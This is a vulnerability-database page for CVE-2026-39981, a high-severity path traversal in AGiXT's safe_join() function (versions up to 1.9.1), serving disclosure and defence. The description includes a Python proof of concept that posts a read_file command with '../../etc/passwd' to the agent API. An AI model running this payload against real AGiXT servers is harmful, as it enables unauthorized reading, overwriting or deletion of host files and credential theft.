EUVD-2026-20974

| CVE-2026-39981 HIGH
2026-04-08 https://github.com/Josh-XT/AGiXT GHSA-5gfj-64gh-mgmw
8.8
CVSS 3.1
Share

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

4
Patch Released
Apr 09, 2026 - 20:30 nvd
Patch available
EUVD ID Assigned
Apr 09, 2026 - 14:45 euvd
EUVD-2026-20974
Analysis Generated
Apr 09, 2026 - 14:45 vuln.today
CVE Published
Apr 08, 2026 - 20:02 nvd
HIGH 8.8

Description

### Summary The safe_join() function in the essential_abilities extension fails to validate that resolved file paths remain within the designated agent workspace. An authenticated attacker can use directory traversal sequences to read, write, or delete arbitrary files on the server hosting the AGiXT instance. ### Details `agixt/endpoints/Extension.py:165` (source) -> `agixt/XT.py:1035` (hop) -> `agixt/extensions/essential_abilities.py:436` (sink) ```python # source command_args = command.command_args # hop response = await Extensions(...).execute_command(command_name=command_name, command_args=command_args) # sink new_path = os.path.normpath(os.path.join(self.WORKING_DIRECTORY, *paths.split("/"))) ``` ### PoC ```python # tested on: agixt<=1.9.1 # install: pip install agixt==1.9.1 import requests BASE = "http://localhost:7437" TOKEN = "<your_api_key>" headers = {"Authorization": f"Bearer {TOKEN}"} payload = { "command_name": "read_file", "command_args": { "filename": "../../etc/passwd" } } r = requests.post(f"{BASE}/api/agent/MyAgent/command", json=payload, headers=headers) print(r.text) # expected output: root:x:0:0:root:/root:/bin/bash ... ``` ### Impact Authenticated users can read, overwrite, or delete arbitrary files on the host server, enabling credential theft, persistent code execution, or denial of service. Authentication is required but no elevated privileges are needed beyond a valid API key.

Analysis

Path traversal in AGiXT Python package (versions ≤1.9.1) allows authenticated attackers to read, write, or delete arbitrary files on the host server. The essential_abilities extension's safe_join() function fails to validate that resolved paths remain within the agent workspace directory, enabling directory traversal sequences (e.g., ../../etc/passwd) to bypass intended file access restrictions. …

Sign in for full analysis, threat intelligence, and remediation guidance.

Priority Score

44
Low Medium High Critical
KEV: 0
EPSS: +0.5
CVSS: +44
POC: 0

Share

EUVD-2026-20974 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy